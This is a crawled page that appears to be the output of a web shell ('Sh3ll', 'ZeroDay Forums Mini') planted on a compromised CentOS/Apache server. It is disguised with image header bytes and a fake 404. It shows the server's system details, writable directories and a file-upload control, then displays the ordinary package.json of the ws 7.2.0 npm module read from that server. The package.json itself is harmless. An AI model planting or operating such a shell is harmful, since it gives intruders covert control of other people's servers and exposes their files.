����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /proc/self/root/home/real/node_modules/ws/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/self/root/home/real/node_modules/ws/package.json
{
  "_args": [
    [
      {
        "raw": "ws@^7.1.2",
        "scope": null,
        "escapedName": "ws",
        "name": "ws",
        "rawSpec": "^7.1.2",
        "spec": ">=7.1.2 <8.0.0",
        "type": "range"
      },
      "/home/real/node_modules/engine.io"
    ]
  ],
  "_from": "ws@>=7.1.2 <8.0.0",
  "_hasShrinkwrap": false,
  "_id": "[email protected]",
  "_inCache": true,
  "_location": "/ws",
  "_nodeVersion": "12.12.0",
  "_npmOperationalInternal": {
    "host": "s3://npm-registry-packages",
    "tmp": "tmp/ws_7.2.0_1571495090326_0.4486534033801446"
  },
  "_npmUser": {
    "name": "lpinca",
    "email": "[email protected]"
  },
  "_npmVersion": "6.11.3",
  "_phantomChildren": {},
  "_requested": {
    "raw": "ws@^7.1.2",
    "scope": null,
    "escapedName": "ws",
    "name": "ws",
    "rawSpec": "^7.1.2",
    "spec": ">=7.1.2 <8.0.0",
    "type": "range"
  },
  "_requiredBy": [
    "/engine.io"
  ],
  "_resolved": "https://registry.npmjs.org/ws/-/ws-7.2.0.tgz",
  "_shasum": "422eda8c02a4b5dba7744ba66eebbd84bcef0ec7",
  "_shrinkwrap": null,
  "_spec": "ws@^7.1.2",
  "_where": "/home/real/node_modules/engine.io",
  "author": {
    "name": "Einar Otto Stangvik",
    "email": "[email protected]",
    "url": "http://2x.io"
  },
  "browser": "browser.js",
  "bugs": {
    "url": "https://github.com/websockets/ws/issues"
  },
  "dependencies": {
    "async-limiter": "^1.0.0"
  },
  "description": "Simple to use, blazing fast and thoroughly tested websocket client and server for Node.js",
  "devDependencies": {
    "benchmark": "^2.1.4",
    "bufferutil": "^4.0.1",
    "coveralls": "^3.0.3",
    "eslint": "^6.0.0",
    "eslint-config-prettier": "^6.0.0",
    "eslint-plugin-prettier": "^3.0.1",
    "mocha": "^6.1.3",
    "nyc": "^14.0.0",
    "prettier": "^1.17.0",
    "utf-8-validate": "^5.0.2"
  },
  "directories": {},
  "dist": {
    "integrity": "sha512-+SqNqFbwTm/0DC18KYzIsMTnEWpLwJsiasW/O17la4iDRRIO9uaHbvKiAS3AHgTiuuWerK/brj4O6MYZkei9xg==",
    "shasum": "422eda8c02a4b5dba7744ba66eebbd84bcef0ec7",
    "tarball": "https://registry.npmjs.org/ws/-/ws-7.2.0.tgz",
    "fileCount": 16,
    "unpackedSize": 107115,
    "npm-signature": "-----BEGIN PGP SIGNATURE-----\r\nVersion: OpenPGP.js v3.0.4\r\nComment: https://openpgpjs.org\r\n\r\nwsFcBAEBCAAQBQJdqxyzCRA9TVsSAnZWagAAVBgP/jP+ViVBra9QaZJe2hlR\nK3rn9Du0thtxJ3fKPRxRpDDogaA8CC9KFtjhgid5yqkkvgd2FPc1ohDC4ovq\nedVVBIP6i9R1uZtFRHoY/I2VQDG2yF2RHwRmlJwe2PWvVLjlRuq1uYjrYW3s\nO5De/3xFl2RrRyV5TPZGFbKyJcPHuy91pbisYOmDD5gAYAegQgJDRvw9pYIn\nmHTu1z4SLqQwxKsyymUYMqaXRPBX2huSpxp39tZQj93q8x1HCx0/zVyiHpan\nrkOdaE4RU/CnlWGvVIu96KzI/Z9gpSYYO5QOff5KXinbk+j5r7jVN9wK0mIy\nN1wikpL61nv6nPHnHH2KK85LViFMUXBIjcAlQxoqQXmbr2r1J24cfSarWlBT\niwtMHg67xyvSf7DdmgJGP/N3Yofd28UEXYHkG7Npqddx3nWVlouYGC91OrP2\nBRPwu+sr9odXlDVXWUxjDNfdgGdB15la87uNi/nKjH+gfmNRPg3p8ZRx2c3c\nusnFJhGV8hwJ6YfYgItilEg6qjUHE7cMjUbQc0hEMwuFrD12TpdMXnYGJ+ml\nC45dYx9lsGIH6ZNTNdWjugX2AWpvjGo54La22BjHuivV2f2bh4QB3dwXo6iU\nwfYHus2hYqkWtiT8PgXG9dMX+3UxgM22uJEhHwuaXBqDKrMCf6wqlqUpmkR1\nXgZ9\r\n=A4o4\r\n-----END PGP SIGNATURE-----\r\n"
  },
  "gitHead": "65f7800d4ed5d6f2076b5bd00b3c4cabfa4d22ef",
  "greenkeeper": {
    "commitMessages": {
      "dependencyUpdate": "[pkg] Update ${dependency} to version ${version}",
      "devDependencyUpdate": "[pkg] Update ${dependency} to version ${version}"
    }
  },
  "homepage": "https://github.com/websockets/ws",
  "keywords": [
    "HyBi",
    "Push",
    "RFC-6455",
    "WebSocket",
    "WebSockets",
    "real-time"
  ],
  "license": "MIT",
  "main": "index.js",
  "maintainers": [
    {
      "name": "3rdeden",
      "email": "[email protected]"
    },
    {
      "name": "einaros",
      "email": "[email protected]"
    },
    {
      "name": "lpinca",
      "email": "[email protected]"
    },
    {
      "name": "v1",
      "email": "[email protected]"
    }
  ],
  "name": "ws",
  "optionalDependencies": {},
  "readme": "ERROR: No README data found!",
  "repository": {
    "type": "git",
    "url": "git+https://github.com/websockets/ws.git"
  },
  "scripts": {
    "integration": "npm run lint && mocha --throw-deprecation test/*.integration.js",
    "lint": "eslint --ignore-path .gitignore . && prettier --check --ignore-path .gitignore \"**/*.{json,md,yaml,yml}\"",
    "test": "npm run lint && nyc --reporter=html --reporter=text mocha --throw-deprecation test/*.test.js"
  },
  "version": "7.2.0"
}

ZeroDay Forums Mini